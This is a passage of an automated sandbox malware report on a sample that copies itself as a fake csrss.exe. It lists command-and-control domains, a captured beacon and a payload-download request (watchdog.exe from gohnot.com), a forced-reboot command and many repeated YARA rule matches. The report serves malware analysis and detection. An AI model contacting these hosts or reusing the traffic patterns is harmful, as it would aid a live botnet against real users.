Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:
Source: csrss.exe String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp String found in binary or memory: https://retoti.com
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://retoti.comidentifier
Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://runmodes.com/api/log
Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.558065286.0000000016974000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com
Source: csrss.exe, 0000000E.00000003.379435337.00000000168F0000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae
Source: csrss.exe, 0000000E.00000002.556753831.0000000016861000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com/api/pollf
Source: csrss.exe, 0000000E.00000002.558133841.00000000169C0000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378575314.00000000169C0000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae
Source: csrss.exe, 0000000E.00000002.558447548.0000000016AC4000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp
Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com
Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://sitescore.aiValue
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: csrss.exe, 0000000E.00000002.556988618.0000000016892000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp String found in binary or memory: https://trumops.com
Source: csrss.exe String found in binary or memory: https://trumops.com/api/install-failureinvalid
Source: 4t4y4r89UZ.exe, 00000000.00000002.299142381.0000000015CBA000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
Source: csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.com
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
Source: csrss.exe, 00000010.00000002.377377894.0000000016814000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397738853.0000000016814000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
Source: unknown HTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
Source: unknown DNS traffic detected: queries for: trumops.com
Source: global traffic HTTP traffic detected: GET /api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1Host: server8.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: f7873597-7b36-4441-9416-097456f134aeVersion: 183Accept-Encoding: gzip

System Summary:

Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Uses 32bit PE files
Source: 4t4y4r89UZ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 0.2.4t4y4r89UZ.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.655bce0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e2bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.55e4f30.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e99a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e29a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e240e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.5574f30.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.557a8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e9bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e940e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.55ea8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
